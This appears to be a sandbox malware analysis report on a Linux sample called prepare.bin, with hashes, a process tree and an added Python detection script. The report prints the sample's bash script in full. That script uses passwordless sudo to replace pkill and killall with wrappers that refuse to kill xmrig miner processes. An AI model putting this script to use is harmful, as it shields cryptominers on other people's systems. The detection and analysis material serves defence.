Analysis

  • max time kernel
    0s
  • max time network
    5s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    02/09/2024, 00:09

General

  • Target

    prepare.bin

  • Size

    15KB

  • MD5

    9304c43102d72225b64e2031c26f4975

  • SHA1

    b898d1cb78830ffb21592f8fc4be8b7ac7d703d1

  • SHA256

    636c27eaaa247cc54c71ec7b0572f751b85f6e6c5895010050cc644a5575b092

  • SHA512

    70df19f4039b794382cb262fb7dd428c951554c473df016bf9b5d896b43e035444ecbaa56fd16b90a595962647cd78187319e16f92d082e9c566757569705f11

  • SSDEEP

    192:R+SwY2gFtlURaF19loEKDOZNXPTRhgPRMYiwSKvUE:dxtlSGKDOvfTRQRMtRE

Score
6/10

Malware Config

Signatures

  • Write file to user bin folder 1 TTPs 2 IoCs
  • Reads runtime system information 30 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/prepare.bin
    /tmp/prepare.bin
    1⤵
      PID:2595
    • /bin/bash
      /tmp/prepare.bin -c "exec '/tmp/prepare.bin' \"\$@\"" /tmp/prepare.bin
      1⤵
        PID:2595
      • /tmp/prepare.bin
        /tmp/prepare.bin
        1⤵
          PID:2595
        • /bin/bash
          /tmp/prepare.bin -c "..." /tmp/prepare.bin
          The -c argument, with its line breaks restored and the report's backslash escaping removed:

          #!/bin/bash
          # check if user has sudo, else exit
          sudo -n true
          if [ $? -eq 0 ]; then
              echo "You have sudo permissions."
          else
              echo "You do not have sudo permissions."
              exit 1
          fi
          # -------- PKILL SECTION --------
          result=$(which pkill)
          sudo -n mv $result $result.bak
          sudo -n echo '#!/bin/bash
          if [[ "$1" == "xmrig" || "$1" == "xmr_linux_amd64" || "$1" == "xmr_linux_arm64" ]]; then
          exit 1
          else
          pkill.bak "$@"
          fi' > $result
          sudo -n chmod +x $result
          # -------- KILLALL SECTION --------
          result=$(which killall)
          sudo -n mv $result $result.bak
          sudo -n echo '#!/bin/bash
          if [[ "$1" == "xmrig" || "$1" == "xmr_linux_amd64" || "$1" == "xmr_linux_arm64" ]]; then
          exit 1
          else
          killall.bak "$@"
          fi' > $result
          sudo -n chmod +x $result
          1⤵
          • Write file to user bin folder
          PID:2595
          • /usr/bin/sudo
            sudo -n true
            2⤵
            • Reads runtime system information
            PID:2596
            • /usr/bin/true
              true
              3⤵
                PID:2597
            • /usr/bin/which
              which pkill
              2⤵
                PID:2598
              • /usr/bin/sudo
                sudo -n mv /usr/bin/pkill /usr/bin/pkill.bak
                2⤵
                • Reads runtime system information
                PID:2599
                • /usr/bin/mv
                  mv /usr/bin/pkill /usr/bin/pkill.bak
                  3⤵
                  • Reads runtime system information
                  PID:2600
              • /usr/bin/sudo
                sudo -n echo "#!/bin/bash
                if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then
                exit 1
                else
                pkill.bak \"\$@\"
                fi"
                2⤵
                • Reads runtime system information
                PID:2601
                • /usr/bin/echo
                  echo "#!/bin/bash
                  if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then
                  exit 1
                  else
                  pkill.bak \"\$@\"
                  fi"
                  3⤵
                    PID:2602
                • /usr/bin/sudo
                  sudo -n chmod +x /usr/bin/pkill
                  2⤵
                  • Reads runtime system information
                  PID:2603
                  • /usr/bin/chmod
                    chmod +x /usr/bin/pkill
                    3⤵
                      PID:2604
                  • /usr/bin/which
                    which killall
                    2⤵
                      PID:2605
                    • /usr/bin/sudo
                      sudo -n mv /usr/bin/killall /usr/bin/killall.bak
                      2⤵
                      • Reads runtime system information
                      PID:2606
                      • /usr/bin/mv
                        mv /usr/bin/killall /usr/bin/killall.bak
                        3⤵
                        • Reads runtime system information
                        PID:2607
                    • /usr/bin/sudo
                      sudo -n echo "#!/bin/bash
                      if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then
                      exit 1
                      else
                      killall.bak \"\$@\"
                      fi"
                      2⤵
                      • Reads runtime system information
                      PID:2608
                      • /usr/bin/echo
                        echo "#!/bin/bash
                        if [[ \"\$1\" == \"xmrig\" || \"\$1\" == \"xmr_linux_amd64\" || \"\$1\" == \"xmr_linux_arm64\" ]]; then
                        exit 1
                        else
                        killall.bak \"\$@\"
                        fi"
                        3⤵
                          PID:2609
                    • /usr/bin/sudo
                      sudo -n chmod +x /usr/bin/killall
                      1⤵
                      • Reads runtime system information
                      PID:2595
                      • /usr/bin/chmod
                        chmod +x /usr/bin/killall
                        2⤵
                          PID:2613
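
The process tree above shows the whole technique: move the real pkill and killall aside as <name>.bak, drop a two-line shell wrapper in their place that exits 1 when asked to kill xmrig or xmr_linux_*, and chmod it executable. The following host check is an added example, not code from the report or from the sample, and does not execute anything from it. It inspects a bin directory for the three artefacts the script leaves behind (a shebang script where an ELF should be, a .bak sibling, and the miner names from the report's echo line) and also covers the half-done case that the sample's own `sudo -n echo '...' > $result` line produces on a host where the caller cannot write to /usr/bin: bash applies the redirect as the calling user, sudo only wraps the echo, so the mv succeeds and the tool simply disappears. The bin directory is a parameter; `build_fixture` creates a constructed temporary directory with fake ELF headers for testing and is not part of any real system.

```python
"""Flag the pkill/killall wrapper the sample above installs.

Added detection example, not code from the report or from the sample. It never
runs the sample; it inspects a bin directory for what the script leaves behind:
  1. pkill or killall is a shell script (shebang) instead of an ELF binary,
  2. a sibling <name>.bak exists (the original binary, moved aside),
  3. the script text names the miner processes it shields (xmrig, ...).
bin_dir is a parameter so the check can run against a mounted image or, as
below, against a constructed fixture.
"""
import os
import re
import tempfile

ELF_MAGIC = b"\x7fELF"
WRAPPED_TOOLS = ("pkill", "killall")
# Process names the dropped wrapper refuses to kill (taken from the report).
MINER_NAMES = ("xmrig", "xmr_linux_amd64", "xmr_linux_arm64")


def inspect_tool(bin_dir, name):
    """Return indicators for one tool in bin_dir."""
    path = os.path.join(bin_dir, name)
    backup_exists = os.path.exists(path + ".bak")
    if not os.path.isfile(path):
        # Tool gone but <name>.bak present: the mv ran, the wrapper was never
        # written. That is what the sample's line does on a host where the
        # caller cannot write to /usr/bin: bash applies '> $result' as the
        # calling user, sudo only wraps the echo.
        return {"path": path, "missing": True, "is_elf": False,
                "is_script": False, "shielded_names": [],
                "calls_backup": False, "backup_exists": backup_exists,
                "wrapped": False, "suspicious": backup_exists}
    with open(path, "rb") as fh:
        head = fh.read(4096)
    is_elf = head.startswith(ELF_MAGIC)
    is_script = head.startswith(b"#!")
    text = head.decode("utf-8", errors="replace")
    shielded = [m for m in MINER_NAMES if m in text]
    calls_backup = re.search(rf"\b{name}\.bak\b", text) is not None
    # A script standing in for the binary that either calls <name>.bak or
    # names a miner is the wrapper; a .bak sibling alone is still suspicious.
    wrapped = is_script and (calls_backup or bool(shielded))
    return {"path": path, "missing": False, "is_elf": is_elf,
            "is_script": is_script, "shielded_names": shielded,
            "calls_backup": calls_backup, "backup_exists": backup_exists,
            "wrapped": wrapped, "suspicious": wrapped or backup_exists}


def scan(bin_dir="/usr/bin"):
    """Inspect each tool the sample replaces; return {name: indicators}."""
    return {n: inspect_tool(bin_dir, n) for n in WRAPPED_TOOLS}


FAKE_ELF = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 60  # constructed header bytes only


def build_fixture(killall_state="intact"):
    """Constructed bin directory mirroring the sample's result for pkill.

    killall is either left intact (a fake ELF, no .bak) or, with
    killall_state="orphaned_backup", moved to killall.bak with no wrapper.
    """
    d = tempfile.mkdtemp(prefix="binwrap-")
    # pkill wrapper, text taken from the echo command line in the report.
    wrapper = (
        "#!/bin/bash\n"
        'if [[ "$1" == "xmrig" || "$1" == "xmr_linux_amd64" '
        '|| "$1" == "xmr_linux_arm64" ]]; then\n'
        "exit 1\nelse\npkill.bak \"$@\"\nfi\n"
    )
    with open(os.path.join(d, "pkill"), "w") as fh:
        fh.write(wrapper)
    with open(os.path.join(d, "pkill.bak"), "wb") as fh:
        fh.write(FAKE_ELF)
    target = "killall" if killall_state == "intact" else "killall.bak"
    with open(os.path.join(d, target), "wb") as fh:
        fh.write(FAKE_ELF)
    return d


if __name__ == "__main__":
    for name, info in scan(build_fixture()).items():
        verdict = "WRAPPED" if info["wrapped"] else ("SUSPICIOUS" if info["suspicious"] else "ok")
        print(f"{name}: {verdict} {info}")
```

On a live host, run `scan()` with the default `/usr/bin` (or the bin directory of a mounted image) and treat any `wrapped` result as confirmed tampering; a `suspicious` result with `missing` set means the move happened but the wrapper was never written, which the file-system view alone will not explain. Restoring is then `mv /usr/bin/pkill.bak /usr/bin/pkill` after the wrapper has been preserved as evidence, but the .bak should itself be hash-checked against the package manager before it is trusted.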

Network

MITRE ATT&CK Enterprise v15

Downloads

• /usr/bin/killall

  Filesize

  142B

  MD5

  b02773cbcd5ea8921fbac0b5c577d923

  SHA1

  1117beac3937d9280678f433d6c7fa51c1e00b0b

  SHA256

  f4a1d3344d10e4941aa67977b9edb8214b56f532fafc00b66690a0ebfd8ad612

  SHA512

  c95575e85983e9a0ee2e312d008a5f52cf9c5923800b9f613038400116e254b9c27ae5a3f449357b0724269063bb9930b35e227a05a0e922b5bc3f2246da973c

• /usr/bin/pkill

  Filesize

  140B

  MD5

  50c285d9bda626a5f6332495ea4527c2

  SHA1

  a72dd91ff971ed8bb5ba482ccb357d834500d672

  SHA256

  61cf2020ce8c121cd8312fb03e724077fc43efa3737cf2c3cebc5ad45b39b021

  SHA512

  2b49d193929e8c0fd82c89c535626f47475cff8f477a75054d0e35eb6fb402161a98e19526af9fa64d1a885746959a9c8988dd28f3efb6853179982902482adc